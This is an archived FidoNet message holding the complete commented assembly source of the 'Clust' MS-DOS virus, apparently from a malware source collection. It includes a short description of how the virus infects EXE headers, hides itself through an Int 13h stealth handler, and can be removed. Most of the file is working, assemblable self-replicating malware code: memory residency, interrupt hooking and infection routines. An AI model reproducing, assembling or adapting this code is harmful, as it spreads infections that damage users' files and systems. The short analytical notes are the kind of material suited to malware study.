MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir50.asm
2021-01-12 18:07:35 -06:00

253 lines
8.0 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 40 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLUST.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48)
;* To : Daniel Hendry
;* Subj : CLUST.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
;Clust Virus from TridenT research group - small but fairly interesting,
;it's one of the more advanced from TridenT that I've seen with the
;possible exception of the TPE.
;This virus goes memory resident at the top of lower memory and hooks
;Int 13h. Whenever an EXE file header is written, it checks to see
;if there is a large field of 0's inside it (VERY common in EXE's)
;and, if so, will put itself inside it and change the exe marker bytes
;'MZ' to a jump to that code. In this way, it effectively converts the
;file to a COM file when it is run. After this it re-executes the EXE
;file. Because of a stealth handler on Int 13h function 2 (absolute
;disk read) the EXE file is read as it originally was (the handler
;zero's out the field in which it resides and restores the jump to
;'MZ'). Because of the way this virus works, it can only infect
;smaller EXE files.
;NOTE:
;Several commands are commented out and have the actual bytes entered
;next to them instead. This is because the compiler that Clust was
;originally compiled on used different translations than mine, and
;I wished to preserve the EXACT virus code.
;Disinfection: Because of this virus' stealth routine, disinfection should
; be possible simply by Zipping or Arjing all EXE files on an
; infected disk, then rebooting from a clean disk and unarchiving
; the files. The original archiving MUST be done while the
; virus is active in memory. Also - after rebooting - make
; sure the program you use to unarchive the files is _NOT_
; infected.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
jmp short EntryPoint
LotsaNOPs db 122 dup (90h) ;Usually will be EXE header....
OldInt13 dd 0
EntryPoint:
db 0e9h,7ch,0 ;jmp InstallVirus
Int13Handler:
cmp ah,3
je IsDiskWrite
cmp ah,2
jne GoInt13
pushf
call cs:OldInt13 ;Call Int 13h
jc Exit13Handler ;Exit on error.
cmp word ptr es:[bx],7EEBh ;Is sector infected?
jne Exit13Handler
mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ'
push di cx ax ;Stealth routine.....
mov cx,115h
xor ax,ax
db 89h,0dfh ;mov di,bx
;Zero out virus from
add di,80h ;sector when it is read.
rep stosb
pop ax cx di
Exit13Handler:
iret
GoInt13:
jmp cs:[OldInt13]
IsDiskWrite:
cmp word ptr es:[bx],5A4Dh ;Is EXE file being written?
jne GoInt13
cmp word ptr es:[bx+4],75h ;Is file too large?
jae GoInt13
push ax cx si di ds
push es
pop ds
db 89h,0deh ;mov si,bx
add si,80h ;Look in EXE header....
mov cx,115h
AllZeros:
lodsb
cmp al,0
loopz AllZeros
cmp cx,0 ;Check to see if entire field
jne ExitInfectHandler ;was zeroed - leave if not.
db 89h,0dfh ;mov di,bx
add di,80h
mov cx,115h
mov si,offset OldInt13
push cs
pop ds
rep movsb
db 89h,0dfh ;mov di,bx
;Copy virus
;over zero area in EXE header.
mov ax,7EEBh ;Stick in Jump over 'MZ'
stosw
ExitInfectHandler:
pop ds di si cx ax ;Allow Write to process now.
jmp short GoInt13
InstallVirus:
mov ax,3513h
int 21h ;Get Int 13 addres
mov word ptr cs:[OldInt13],bx
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh
int 21h ;Flush disk buffers
mov ah,36h
mov dl,0
int 21h ;Get free space on default drive
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:0,'Z' ;Are we the last chain?
jne Terminate ;If not, terminate.
;sub word ptr ds:[3],39h ;subtract from MCB size
db 81h,2eh,03,0,39h,0
;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h ;mov di,si
mov es,ds:[12h] ;ES = new segment
push cs
pop ds
mov cx,115h ;Copy virus into memory
rep movsb
mov ax,2513h
push es
pop ds
mov dx,offset Int13Handler
int 21h ;Set int 13 to virus handler
mov ah,4Ah
push cs
pop es
mov bx,39h
int 21h ;Modify mem alloc.
push cs
pop ds
mov bx,ds:[2ch] ;Get environment segment
mov es,bx
xor ax,ax
mov di,1
ScanForFilename: ;Find name of file executed
dec di ;in environment strings...
scasw ;(located after two 0's)
jnz ScanForFilename
lea si,[di+2]
push bx
pop ds ;DS = environment segment
push cs
pop es ;ES = code segment
mov di,offset Filename
push di
xor bx,bx
CopyFilename:
mov cx,50h
inc bx
lodsb
cmp al,0
jne StoreFilename ;Change zero at end of
mov al,0Dh ;filename to a return
StoreFilename:
stosb
cmp al,0Dh ;If it was a return, we're
loopnz CopyFilename ;done copying the filename
mov byte ptr ds:[28fh],bl
push cs
pop ds
pop si
dec si
int 2Eh ;Re-execute EXE file with
;Stealth handler in memory,
;so Exe is run w/o virus.
Terminate:
mov ah,4Ch
int 21h
db 0
Filename db 1
end start
;-+- Terminate 1.50/Pro
; + Origin: Fred's Place (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)